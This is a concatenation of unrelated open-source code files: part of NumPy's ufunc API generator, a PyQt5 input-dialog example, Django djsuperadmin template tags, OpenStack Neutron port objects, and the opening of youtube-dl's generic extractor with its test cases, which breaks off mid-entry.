Py_DECREF(numpy);
if (c_api == NULL) {
PyErr_SetString(PyExc_AttributeError, "_UFUNC_API not found");
return -1;
}
if (!PyCapsule_CheckExact(c_api)) {
PyErr_SetString(PyExc_RuntimeError, "_UFUNC_API is not PyCapsule object");
Py_DECREF(c_api);
return -1;
}
PyUFunc_API = (void **)PyCapsule_GetPointer(c_api, NULL);
Py_DECREF(c_api);
if (PyUFunc_API == NULL) {
PyErr_SetString(PyExc_RuntimeError, "_UFUNC_API is NULL pointer");
return -1;
}
return 0;
}
#define import_umath() \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
return NULL;\
}\
} while(0)
#define import_umath1(ret) \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
return ret;\
}\
} while(0)
#define import_umath2(ret, msg) \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError, msg);\
return ret;\
}\
} while(0)
#define import_ufunc() \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
}\
} while(0)
#endif
"""
c_template = r"""
/* These pointers will be stored in the C-object for use in other
extension modules
*/
void *PyUFunc_API[] = {
%s
};
"""
def generate_api(output_dir, force=False):
basename = 'ufunc_api'
h_file = os.path.join(output_dir, '__%s.h' % basename)
c_file = os.path.join(output_dir, '__%s.c' % basename)
d_file = os.path.join(output_dir, '%s.txt' % basename)
targets = (h_file, c_file, d_file)
sources = ['ufunc_api_order.txt']
if (not force and not genapi.should_rebuild(targets, sources + [__file__])):
return targets
else:
do_generate_api(targets, sources)
return targets
def do_generate_api(targets, sources):
header_file = targets[0]
c_file = targets[1]
doc_file = targets[2]
ufunc_api_index = genapi.merge_api_dicts((
numpy_api.ufunc_funcs_api,
numpy_api.ufunc_types_api))
genapi.check_api_dict(ufunc_api_index)
ufunc_api_list = genapi.get_api_functions('UFUNC_API', numpy_api.ufunc_funcs_api)
# Create dict name -> *Api instance
ufunc_api_dict = {}
api_name = 'PyUFunc_API'
for f in ufunc_api_list:
name = f.name
index = ufunc_api_index[name][0]
annotations = ufunc_api_index[name][1:]
ufunc_api_dict[name] = FunctionApi(f.name, index, annotations,
f.return_type, f.args, api_name)
for name, val in numpy_api.ufunc_types_api.items():
index = val[0]
ufunc_api_dict[name] = TypeApi(name, index, 'PyTypeObject', api_name)
# set up object API
module_list = []
extension_list = []
init_list = []
for name, index in genapi.order_dict(ufunc_api_index):
api_item = ufunc_api_dict[name]
extension_list.append(api_item.define_from_array_api_string())
init_list.append(api_item.array_api_define())
module_list.append(api_item.internal_define())
# Write to header
s = h_template % ('\n'.join(module_list), '\n'.join(extension_list))
genapi.write_file(header_file, s)
# Write to c-code
s = c_template % ',\n'.join(init_list)
genapi.write_file(c_file, s)
# Write to documentation
s = '''
=================
NumPy Ufunc C-API
=================
'''
for func in ufunc_api_list:
s += func.to_ReST()
s += '\n\n'
genapi.write_file(doc_file, s)
return targets
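# Illustrative build-time usage; the import name and output directory below
# are placeholders, not defined by this module:
#
#   import generate_ufunc_api  # hypothetical module name for this file
#   header, c_src, doc = generate_ufunc_api.generate_api('build/include/numpy')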
|
the-stack_106_14758
|
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import QWidget, QMainWindow, QApplication, QPushButton, QInputDialog, QLineEdit
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn = QPushButton('Open Dialog', self)
btn.move(20, 20)
btn.clicked.connect(self.showDialog)
self.lineEdit = QLineEdit(self)
self.lineEdit.move(130, 22)
# status bar
self.statusBar().showMessage("Ready")
# position
self.setGeometry(300, 300, 250, 150)
# window title
self.setWindowTitle("Input Dialog")
# show window
self.show()
def showDialog(self):
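# QInputDialog.getText() blocks until the dialog is closed and returns a
# (text, ok) tuple; ok is True only if the user accepted the dialog.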
text, ok = QInputDialog.getText(self, "Input Dialog", "Input your name:")
if ok:
self.lineEdit.setText(str(text))
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
|
the-stack_106_14759
|
import os
from django import template
from django.utils.safestring import mark_safe
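# The helpers below wrap an object's attribute in a <span> carrying
# data-djsa-* attributes (editor mode, object id, GET/PATCH endpoints) that
# the djsuperadmin front-end bundle uses for in-place editing by superusers;
# non-superusers just get the raw attribute value.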
def _get_obj_span(obj, attribute, placeholder, editor_mode):
span = '<span class="djsuperadmin"'
span += ' data-djsa-mode="%s"' % editor_mode
span += ' data-djsa-id="%s"' % str(obj.id)
span += ' data-djsa-getcontenturl="%s"' % str(obj.superadmin_get_url)
span += ' data-djsa-patchcontenturl="%s"' % str(obj.superadmin_patch_url)
span += ">%s</span>" % getattr(obj, attribute, placeholder)
return span
def _get_obj_content(context, obj, attribute, placeholder="New content", editor_mode=1):
if context["request"].user.is_superuser:
return mark_safe(_get_obj_span(obj, attribute, placeholder, editor_mode))
else:
return mark_safe(getattr(obj, attribute, placeholder))
register = template.Library()
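# Illustrative template usage (the load name depends on this module's file
# name, assumed here to be djsuperadmin_tags.py):
#
#   {% load djsuperadmin_tags %}
#   {% superadmin_content page "content" %}
#   {% djsuperadminjs %}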
@register.simple_tag(takes_context=True)
def superadmin_content(context, obj, attribute):
return _get_obj_content(context, obj, attribute)
@register.simple_tag(takes_context=True)
def superadmin_raw_content(context, obj, attribute):
return _get_obj_content(context, obj, attribute, editor_mode=0)
@register.simple_tag(takes_context=True)
def djsuperadminjs(context):
if (
context["request"].user.is_authenticated
and context["request"].user.is_superuser
):
superadmin_basedir = os.path.abspath(os.path.dirname(__file__))
with open(
os.path.join(superadmin_basedir, "..", "dist", "djsuperadmin.bundle.js"),
"r",
) as js_file:
js = '<script src="https://cdn.ckeditor.com/4.12.1/standard/ckeditor.js"></script>'
js += '<script>var djsa_logout_url="%s";%s</script>' % ("", js_file.read())
return mark_safe(js)
return ""
|
the-stack_106_14760
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netaddr
from oslo_serialization import jsonutils
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db.models import dns as dns_models
from neutron.db.models import securitygroup as sg_models
from neutron.db import models_v2
from neutron.db.qos import models as qos_models
from neutron.objects import base
from neutron.objects import common_types
from neutron.objects.db import api as obj_db_api
from neutron.plugins.ml2 import models as ml2_models
class PortBindingBase(base.NeutronDbObject):
foreign_keys = {
'Port': {'port_id': 'id'},
}
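# vif_details is stored as a JSON string in the database; the two hooks
# below serialise it on the way to the DB and deserialise it on the way out.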
@classmethod
def modify_fields_to_db(cls, fields):
result = super(PortBindingBase, cls).modify_fields_to_db(fields)
if 'vif_details' in result:
result['vif_details'] = (
cls.filter_to_json_str(result['vif_details']))
return result
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(PortBindingBase, cls).modify_fields_from_db(db_obj)
if 'vif_details' in fields:
if fields['vif_details']:
fields['vif_details'] = jsonutils.loads(fields['vif_details'])
if not fields['vif_details']:
fields['vif_details'] = None
return fields
@obj_base.VersionedObjectRegistry.register
class PortBinding(PortBindingBase):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.PortBinding
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'profile': obj_fields.StringField(),
'vif_type': obj_fields.StringField(),
'vif_details': obj_fields.DictOfStringsField(nullable=True),
'vnic_type': obj_fields.StringField(),
}
primary_keys = ['port_id']
@obj_base.VersionedObjectRegistry.register
class DistributedPortBinding(PortBindingBase):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.DistributedPortBinding
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'profile': obj_fields.StringField(),
'vif_type': obj_fields.StringField(),
'vif_details': obj_fields.DictOfStringsField(nullable=True),
'vnic_type': obj_fields.StringField(),
# NOTE(ihrachys): Fields below are specific to this type of binding. In
# the future, we could think of converging different types of bindings
# into a single field
'status': obj_fields.StringField(),
'router_id': obj_fields.StringField(nullable=True),
}
primary_keys = ['host', 'port_id']
@obj_base.VersionedObjectRegistry.register
class PortBindingLevel(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = ml2_models.PortBindingLevel
primary_keys = ['port_id', 'host', 'level']
fields = {
'port_id': obj_fields.UUIDField(),
'host': obj_fields.StringField(),
'level': obj_fields.IntegerField(),
'driver': obj_fields.StringField(nullable=True),
'segment': obj_fields.ObjectField(
'NetworkSegment', nullable=True
),
}
synthetic_fields = ['segment']
foreign_keys = {
'Port': {'port_id': 'id'},
}
@classmethod
def get_objects(cls, context, _pager=None, validate_filters=True,
**kwargs):
if not _pager:
_pager = base.Pager()
if not _pager.sorts:
# (NOTE) True means ASC, False is DESC
_pager.sorts = [('port_id', True), ('level', True)]
return super(PortBindingLevel, cls).get_objects(
context, _pager, validate_filters, **kwargs)
@obj_base.VersionedObjectRegistry.register
class IPAllocation(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = models_v2.IPAllocation
fields = {
'port_id': obj_fields.UUIDField(nullable=True),
'subnet_id': obj_fields.UUIDField(),
'network_id': obj_fields.UUIDField(),
'ip_address': obj_fields.IPAddressField(),
}
primary_keys = ['subnet_id', 'network_id', 'ip_address']
foreign_keys = {
'Port': {'port_id': 'id'},
}
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_to_db(cls, fields):
result = super(IPAllocation, cls).modify_fields_to_db(fields)
if 'ip_address' in result:
result['ip_address'] = cls.filter_to_str(result['ip_address'])
return result
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(IPAllocation, cls).modify_fields_from_db(db_obj)
if 'ip_address' in fields:
fields['ip_address'] = netaddr.IPAddress(fields['ip_address'])
return fields
@obj_base.VersionedObjectRegistry.register
class PortDNS(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = dns_models.PortDNS
primary_keys = ['port_id']
foreign_keys = {
'Port': {'port_id': 'id'},
}
fields = {
'port_id': obj_fields.UUIDField(),
'current_dns_name': common_types.DomainNameField(),
'current_dns_domain': common_types.DomainNameField(),
'previous_dns_name': common_types.DomainNameField(),
'previous_dns_domain': common_types.DomainNameField(),
'dns_name': common_types.DomainNameField(),
}
@obj_base.VersionedObjectRegistry.register
class Port(base.NeutronDbObject):
# Version 1.0: Initial version
VERSION = '1.0'
db_model = models_v2.Port
fields = {
'id': obj_fields.UUIDField(),
'project_id': obj_fields.StringField(nullable=True),
'name': obj_fields.StringField(nullable=True),
'network_id': obj_fields.UUIDField(),
'mac_address': common_types.MACAddressField(),
'admin_state_up': obj_fields.BooleanField(),
'device_id': obj_fields.StringField(),
'device_owner': obj_fields.StringField(),
'status': obj_fields.StringField(),
'allowed_address_pairs': obj_fields.ListOfObjectsField(
'AllowedAddressPair', nullable=True
),
'binding': obj_fields.ObjectField(
'PortBinding', nullable=True
),
'dhcp_options': obj_fields.ListOfObjectsField(
'ExtraDhcpOpt', nullable=True
),
'distributed_binding': obj_fields.ObjectField(
'DistributedPortBinding', nullable=True
),
'dns': obj_fields.ObjectField('PortDNS', nullable=True),
'fixed_ips': obj_fields.ListOfObjectsField(
'IPAllocation', nullable=True
),
# TODO(ihrachys): consider converting to boolean
'security': obj_fields.ObjectField(
'PortSecurity', nullable=True
),
'security_group_ids': common_types.SetOfUUIDsField(
nullable=True,
# TODO(ihrachys): how do we safely pass a mutable default?
default=None,
),
'qos_policy_id': obj_fields.UUIDField(nullable=True, default=None),
'binding_levels': obj_fields.ListOfObjectsField(
'PortBindingLevel', nullable=True
),
# TODO(ihrachys): consider adding a 'dns_assignment' fully synthetic
# field in later object iterations
}
synthetic_fields = [
'allowed_address_pairs',
'binding',
'binding_levels',
'dhcp_options',
'distributed_binding',
'dns',
'fixed_ips',
'qos_policy_id',
'security',
'security_group_ids',
]
fields_need_translation = {
'binding': 'port_binding',
'dhcp_options': 'dhcp_opts',
'distributed_binding': 'distributed_port_binding',
'security': 'port_security',
}
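# security_group_ids and qos_policy_id are synthetic fields: create() and
# update() persist them through separate binding tables
# (SecurityGroupPortBinding, QosPortPolicyBinding) instead of columns on the
# port row itself.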
def create(self):
fields = self.obj_get_changes()
with db_api.autonested_transaction(self.obj_context.session):
sg_ids = self.security_group_ids
if sg_ids is None:
sg_ids = set()
qos_policy_id = self.qos_policy_id
super(Port, self).create()
if 'security_group_ids' in fields:
self._attach_security_groups(sg_ids)
if 'qos_policy_id' in fields:
self._attach_qos_policy(qos_policy_id)
def update(self):
fields = self.obj_get_changes()
with db_api.autonested_transaction(self.obj_context.session):
super(Port, self).update()
if 'security_group_ids' in fields:
self._attach_security_groups(fields['security_group_ids'])
if 'qos_policy_id' in fields:
self._attach_qos_policy(fields['qos_policy_id'])
def _attach_qos_policy(self, qos_policy_id):
# TODO(ihrachys): introduce an object for the binding to isolate
# database access in a single place, currently scattered between port
# and policy objects
obj_db_api.delete_objects(
self.obj_context, qos_models.QosPortPolicyBinding, port_id=self.id)
if qos_policy_id:
obj_db_api.create_object(
self.obj_context, qos_models.QosPortPolicyBinding,
{'port_id': self.id, 'policy_id': qos_policy_id}
)
self.qos_policy_id = qos_policy_id
self.obj_reset_changes(['qos_policy_id'])
def _attach_security_groups(self, sg_ids):
# TODO(ihrachys): consider introducing an (internal) object for the
# binding to decouple database operations a bit more
obj_db_api.delete_objects(
self.obj_context, sg_models.SecurityGroupPortBinding,
port_id=self.id,
)
if sg_ids:
for sg_id in sg_ids:
self._attach_security_group(sg_id)
self.security_group_ids = sg_ids
self.obj_reset_changes(['security_group_ids'])
def _attach_security_group(self, sg_id):
obj_db_api.create_object(
self.obj_context, sg_models.SecurityGroupPortBinding,
{'port_id': self.id, 'security_group_id': sg_id}
)
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_to_db(cls, fields):
result = super(Port, cls).modify_fields_to_db(fields)
if 'mac_address' in result:
result['mac_address'] = cls.filter_to_str(result['mac_address'])
return result
# TODO(rossella_s): get rid of it once we switch the db model to using
# custom types.
@classmethod
def modify_fields_from_db(cls, db_obj):
fields = super(Port, cls).modify_fields_from_db(db_obj)
if 'mac_address' in fields:
fields['mac_address'] = utils.AuthenticEUI(fields['mac_address'])
distributed_port_binding = fields.get('distributed_binding')
if distributed_port_binding:
fields['distributed_binding'] = fields['distributed_binding'][0]
else:
fields['distributed_binding'] = None
return fields
def from_db_object(self, db_obj):
super(Port, self).from_db_object(db_obj)
# extract security group bindings
if db_obj.get('security_groups', []):
self.security_group_ids = {
sg.security_group_id
for sg in db_obj.security_groups
}
else:
self.security_group_ids = set()
self.obj_reset_changes(['security_group_ids'])
# extract qos policy binding
if db_obj.get('qos_policy_binding'):
self.qos_policy_id = (
db_obj.qos_policy_binding.policy_id
)
else:
self.qos_policy_id = None
self.obj_reset_changes(['qos_policy_id'])
|
the-stack_106_14761
|
# coding: utf-8
from __future__ import unicode_literals
import os
import re
import sys
from .common import InfoExtractor
from .youtube import YoutubeIE
from ..compat import (
compat_etree_fromstring,
compat_str,
compat_urllib_parse_unquote,
compat_urlparse,
compat_xml_parse_error,
)
from ..utils import (
determine_ext,
ExtractorError,
float_or_none,
HEADRequest,
is_html,
js_to_json,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
sanitized_Request,
smuggle_url,
unescapeHTML,
unified_strdate,
unsmuggle_url,
UnsupportedError,
xpath_text,
)
from .commonprotocols import RtmpIE
from .brightcove import (
BrightcoveLegacyIE,
BrightcoveNewIE,
)
from .nexx import (
NexxIE,
NexxEmbedIE,
)
from .nbc import NBCSportsVPlayerIE
from .ooyala import OoyalaIE
from .rutv import RUTVIE
from .tvc import TVCIE
from .sportbox import SportBoxIE
from .smotri import SmotriIE
from .myvi import MyviIE
from .condenast import CondeNastIE
from .udn import UDNEmbedIE
from .senateisvp import SenateISVPIE
from .svt import SVTIE
from .pornhub import PornHubIE
from .xhamster import XHamsterEmbedIE
from .tnaflix import TNAFlixNetworkEmbedIE
from .drtuber import DrTuberIE
from .redtube import RedTubeIE
from .tube8 import Tube8IE
from .vimeo import VimeoIE
from .dailymotion import DailymotionIE
from .dailymail import DailyMailIE
from .onionstudios import OnionStudiosIE
from .viewlift import ViewLiftEmbedIE
from .mtv import MTVServicesEmbeddedIE
from .pladform import PladformIE
from .videomore import VideomoreIE
from .webcaster import WebcasterFeedIE
from .googledrive import GoogleDriveIE
from .jwplatform import JWPlatformIE
from .digiteka import DigitekaIE
from .arkena import ArkenaIE
from .instagram import InstagramIE
from .liveleak import LiveLeakIE
from .threeqsdn import ThreeQSDNIE
from .theplatform import ThePlatformIE
from .kaltura import KalturaIE
from .eagleplatform import EaglePlatformIE
from .facebook import FacebookIE
from .soundcloud import SoundcloudEmbedIE
from .tunein import TuneInBaseIE
from .vbox7 import Vbox7IE
from .dbtv import DBTVIE
from .piksel import PikselIE
from .videa import VideaIE
from .twentymin import TwentyMinutenIE
from .ustream import UstreamIE
from .videopress import VideoPressIE
from .rutube import RutubeIE
from .limelight import LimelightBaseIE
from .anvato import AnvatoIE
from .washingtonpost import WashingtonPostIE
from .wistia import WistiaIE
from .mediaset import MediasetIE
from .joj import JojIE
from .megaphone import MegaphoneIE
from .vzaar import VzaarIE
from .channel9 import Channel9IE
from .vshare import VShareIE
from .mediasite import MediasiteIE
from .springboardplatform import SpringboardPlatformIE
from .yapfiles import YapFilesIE
from .vice import ViceIE
from .xfileshare import XFileShareIE
from .cloudflarestream import CloudflareStreamIE
from .peertube import PeerTubeIE
from .teachable import TeachableIE
from .indavideo import IndavideoEmbedIE
from .apa import APAIE
from .foxnews import FoxNewsIE
from .viqeo import ViqeoIE
from .expressen import ExpressenIE
from .zype import ZypeIE
from .odnoklassniki import OdnoklassnikiIE
from .kinja import KinjaEmbedIE
class GenericIE(InfoExtractor):
IE_DESC = 'Generic downloader that works on some sites'
_VALID_URL = r'.*'
IE_NAME = 'generic'
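# Each _TESTS entry pairs a sample URL with the metadata the extractor is
# expected to produce; keys such as 'md5', 'info_dict', 'params', 'skip' and
# 'expected_warnings' drive and gate youtube-dl's download test harness.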
_TESTS = [
# Direct link to a video
{
'url': 'http://media.w3.org/2010/05/sintel/trailer.mp4',
'md5': '67d406c2bcb6af27fa886f31aa934bbe',
'info_dict': {
'id': 'trailer',
'ext': 'mp4',
'title': 'trailer',
'upload_date': '20100513',
}
},
# Direct link to media delivered compressed (until Accept-Encoding is *)
{
'url': 'http://calimero.tk/muzik/FictionJunction-Parallel_Hearts.flac',
'md5': '128c42e68b13950268b648275386fc74',
'info_dict': {
'id': 'FictionJunction-Parallel_Hearts',
'ext': 'flac',
'title': 'FictionJunction-Parallel_Hearts',
'upload_date': '20140522',
},
'expected_warnings': [
'URL could be a direct video link, returning it as such.'
],
'skip': 'URL invalid',
},
# Direct download with broken HEAD
{
'url': 'http://ai-radio.org:8000/radio.opus',
'info_dict': {
'id': 'radio',
'ext': 'opus',
'title': 'radio',
},
'params': {
'skip_download': True, # infinite live stream
},
'expected_warnings': [
r'501.*Not Implemented',
r'400.*Bad Request',
],
},
# Direct link with incorrect MIME type
{
'url': 'http://ftp.nluug.nl/video/nluug/2014-11-20_nj14/zaal-2/5_Lennart_Poettering_-_Systemd.webm',
'md5': '4ccbebe5f36706d85221f204d7eb5913',
'info_dict': {
'url': 'http://ftp.nluug.nl/video/nluug/2014-11-20_nj14/zaal-2/5_Lennart_Poettering_-_Systemd.webm',
'id': '5_Lennart_Poettering_-_Systemd',
'ext': 'webm',
'title': '5_Lennart_Poettering_-_Systemd',
'upload_date': '20141120',
},
'expected_warnings': [
'URL could be a direct video link, returning it as such.'
]
},
# RSS feed
{
'url': 'http://phihag.de/2014/youtube-dl/rss2.xml',
'info_dict': {
'id': 'http://phihag.de/2014/youtube-dl/rss2.xml',
'title': 'Zero Punctuation',
'description': 're:.*groundbreaking video review series.*'
},
'playlist_mincount': 11,
},
# RSS feed with enclosure
{
'url': 'http://podcastfeeds.nbcnews.com/audio/podcast/MSNBC-MADDOW-NETCAST-M4V.xml',
'info_dict': {
'id': 'pdv_maddow_netcast_m4v-02-27-2015-201624',
'ext': 'm4v',
'upload_date': '20150228',
'title': 'pdv_maddow_netcast_m4v-02-27-2015-201624',
}
},
# RSS feed with enclosures and unsupported link URLs
{
'url': 'http://www.hellointernet.fm/podcast?format=rss',
'info_dict': {
'id': 'http://www.hellointernet.fm/podcast?format=rss',
'description': 'CGP Grey and Brady Haran talk about YouTube, life, work, whatever.',
'title': 'Hello Internet',
},
'playlist_mincount': 100,
},
# SMIL from http://videolectures.net/promogram_igor_mekjavic_eng
{
'url': 'http://videolectures.net/promogram_igor_mekjavic_eng/video/1/smil.xml',
'info_dict': {
'id': 'smil',
'ext': 'mp4',
'title': 'Automatics, robotics and biocybernetics',
'description': 'md5:815fc1deb6b3a2bff99de2d5325be482',
'upload_date': '20130627',
'formats': 'mincount:16',
'subtitles': 'mincount:1',
},
'params': {
'force_generic_extractor': True,
'skip_download': True,
},
},
# SMIL from http://www1.wdr.de/mediathek/video/livestream/index.html
{
'url': 'http://metafilegenerator.de/WDR/WDR_FS/hds/hds.smil',
'info_dict': {
'id': 'hds',
'ext': 'flv',
'title': 'hds',
'formats': 'mincount:1',
},
'params': {
'skip_download': True,
},
},
# SMIL from https://www.restudy.dk/video/play/id/1637
{
'url': 'https://www.restudy.dk/awsmedia/SmilDirectory/video_1637.xml',
'info_dict': {
'id': 'video_1637',
'ext': 'flv',
'title': 'video_1637',
'formats': 'mincount:3',
},
'params': {
'skip_download': True,
},
},
# SMIL from http://adventure.howstuffworks.com/5266-cool-jobs-iditarod-musher-video.htm
{
'url': 'http://services.media.howstuffworks.com/videos/450221/smil-service.smil',
'info_dict': {
'id': 'smil-service',
'ext': 'flv',
'title': 'smil-service',
'formats': 'mincount:1',
},
'params': {
'skip_download': True,
},
},
# SMIL from http://new.livestream.com/CoheedandCambria/WebsterHall/videos/4719370
{
'url': 'http://api.new.livestream.com/accounts/1570303/events/1585861/videos/4719370.smil',
'info_dict': {
'id': '4719370',
'ext': 'mp4',
'title': '571de1fd-47bc-48db-abf9-238872a58d1f',
'formats': 'mincount:3',
},
'params': {
'skip_download': True,
},
},
# XSPF playlist from http://www.telegraaf.nl/tv/nieuws/binnenland/24353229/__Tikibad_ontruimd_wegens_brand__.html
{
'url': 'http://www.telegraaf.nl/xml/playlist/2015/8/7/mZlp2ctYIUEB.xspf',
'info_dict': {
'id': 'mZlp2ctYIUEB',
'ext': 'mp4',
'title': 'Tikibad ontruimd wegens brand',
'description': 'md5:05ca046ff47b931f9b04855015e163a4',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 33,
},
'params': {
'skip_download': True,
},
},
# MPD from http://dash-mse-test.appspot.com/media.html
{
'url': 'http://yt-dash-mse-test.commondatastorage.googleapis.com/media/car-20120827-manifest.mpd',
'md5': '4b57baab2e30d6eb3a6a09f0ba57ef53',
'info_dict': {
'id': 'car-20120827-manifest',
'ext': 'mp4',
'title': 'car-20120827-manifest',
'formats': 'mincount:9',
'upload_date': '20130904',
},
'params': {
'format': 'bestvideo',
},
},
# m3u8 served with Content-Type: audio/x-mpegURL; charset=utf-8
{
'url': 'http://once.unicornmedia.com/now/master/playlist/bb0b18ba-64f5-4b1b-a29f-0ac252f06b68/77a785f3-5188-4806-b788-0893a61634ed/93677179-2d99-4ef4-9e17-fe70d49abfbf/content.m3u8',
'info_dict': {
'id': 'content',
'ext': 'mp4',
'title': 'content',
'formats': 'mincount:8',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'skip': 'video gone',
},
# m3u8 served with Content-Type: text/plain
{
'url': 'http://www.nacentapps.com/m3u8/index.m3u8',
'info_dict': {
'id': 'index',
'ext': 'mp4',
'title': 'index',
'upload_date': '20140720',
'formats': 'mincount:11',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
'skip': 'video gone',
},
# google redirect
{
'url': 'http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CCUQtwIwAA&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DcmQHVoWB5FY&ei=F-sNU-LLCaXk4QT52ICQBQ&usg=AFQjCNEw4hL29zgOohLXvpJ-Bdh2bils1Q&bvm=bv.61965928,d.bGE',
'info_dict': {
'id': 'cmQHVoWB5FY',
'ext': 'mp4',
'upload_date': '20130224',
'uploader_id': 'TheVerge',
'description': r're:^Chris Ziegler takes a look at the\.*',
'uploader': 'The Verge',
'title': 'First Firefox OS phones side-by-side',
},
'params': {
'skip_download': False,
}
},
{
# redirect in Refresh HTTP header
'url': 'https://www.facebook.com/l.php?u=https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DpO8h3EaFRdo&h=TAQHsoToz&enc=AZN16h-b6o4Zq9pZkCCdOLNKMN96BbGMNtcFwHSaazus4JHT_MFYkAA-WARTX2kvsCIdlAIyHZjl6d33ILIJU7Jzwk_K3mcenAXoAzBNoZDI_Q7EXGDJnIhrGkLXo_LJ_pAa2Jzbx17UHMd3jAs--6j2zaeto5w9RTn8T_1kKg3fdC5WPX9Dbb18vzH7YFX0eSJmoa6SP114rvlkw6pkS1-T&s=1',
'info_dict': {
'id': 'pO8h3EaFRdo',
'ext': 'mp4',
'title': 'Tripeo Boiler Room x Dekmantel Festival DJ Set',
'description': 'md5:6294cc1af09c4049e0652b51a2df10d5',
'upload_date': '20150917',
'uploader_id': 'brtvofficial',
'uploader': 'Boiler Room',
},
'params': {
'skip_download': False,
},
},
{
'url': 'http://www.hodiho.fr/2013/02/regis-plante-sa-jeep.html',
'md5': '85b90ccc9d73b4acd9138d3af4c27f89',
'info_dict': {
'id': '13601338388002',
'ext': 'mp4',
'uploader': 'www.hodiho.fr',
'title': 'R\u00e9gis plante sa Jeep',
}
},
# bandcamp page with custom domain
{
'add_ie': ['Bandcamp'],
'url': 'http://bronyrock.com/track/the-pony-mash',
'info_dict': {
'id': '3235767654',
'ext': 'mp3',
'title': 'The Pony Mash',
'uploader': 'M_Pallante',
},
'skip': 'There is a limit of 200 free downloads / month for the test song',
},
{
# embedded brightcove video
# it also tests brightcove videos that need to set the 'Referer'
# in the http requests
'add_ie': ['BrightcoveLegacy'],
'url': 'http://www.bfmtv.com/video/bfmbusiness/cours-bourse/cours-bourse-l-analyse-technique-154522/',
'info_dict': {
'id': '2765128793001',
'ext': 'mp4',
'title': 'Le cours de bourse : l’analyse technique',
'description': 'md5:7e9ad046e968cb2d1114004aba466fd9',
'uploader': 'BFM BUSINESS',
},
'params': {
'skip_download': True,
},
},
{
# embedded with itemprop embedURL and video id spelled as `idVideo`
'add_ie': ['BrightcoveLegacy'],
'url': 'http://bfmbusiness.bfmtv.com/mediaplayer/chroniques/olivier-delamarche/',
'info_dict': {
'id': '5255628253001',
'ext': 'mp4',
'title': 'md5:37c519b1128915607601e75a87995fc0',
'description': 'md5:37f7f888b434bb8f8cc8dbd4f7a4cf26',
'uploader': 'BFM BUSINESS',
'uploader_id': '876450612001',
'timestamp': 1482255315,
'upload_date': '20161220',
},
'params': {
'skip_download': True,
},
},
{
# https://github.com/ytdl-org/youtube-dl/issues/2253
'url': 'http://bcove.me/i6nfkrc3',
'md5': '0ba9446db037002366bab3b3eb30c88c',
'info_dict': {
'id': '3101154703001',
'ext': 'mp4',
'title': 'Still no power',
'uploader': 'thestar.com',
'description': 'Mississauga resident David Farmer is still out of power as a result of the ice storm a month ago. To keep the house warm, Farmer cuts wood from his property for a wood burning stove downstairs.',
},
'add_ie': ['BrightcoveLegacy'],
'skip': 'video gone',
},
{
'url': 'http://www.championat.com/video/football/v/87/87499.html',
'md5': 'fb973ecf6e4a78a67453647444222983',
'info_dict': {
'id': '3414141473001',
'ext': 'mp4',
'title': 'Видео. Удаление Дзагоева (ЦСКА)',
'description': 'Онлайн-трансляция матча ЦСКА - "Волга"',
'uploader': 'Championat',
},
},
{
# https://github.com/ytdl-org/youtube-dl/issues/3541
'add_ie': ['BrightcoveLegacy'],
'url': 'http://www.kijk.nl/sbs6/leermijvrouwenkennen/videos/jqMiXKAYan2S/aflevering-1',
'info_dict': {
'id': '3866516442001',
'ext': 'mp4',
'title': 'Leer mij vrouwen kennen: Aflevering 1',
'description': 'Leer mij vrouwen kennen: Aflevering 1',
'uploader': 'SBS Broadcasting',
},
'skip': 'Restricted to Netherlands',
'params': {
'skip_download': True, # m3u8 download
},
},
{
# Brightcove video in <iframe>
'url': 'http://www.un.org/chinese/News/story.asp?NewsID=27724',
'md5': '36d74ef5e37c8b4a2ce92880d208b968',
'info_dict': {
'id': '5360463607001',
'ext': 'mp4',
'title': '叙利亚失明儿童在废墟上演唱《心跳》 呼吁获得正常童年生活',
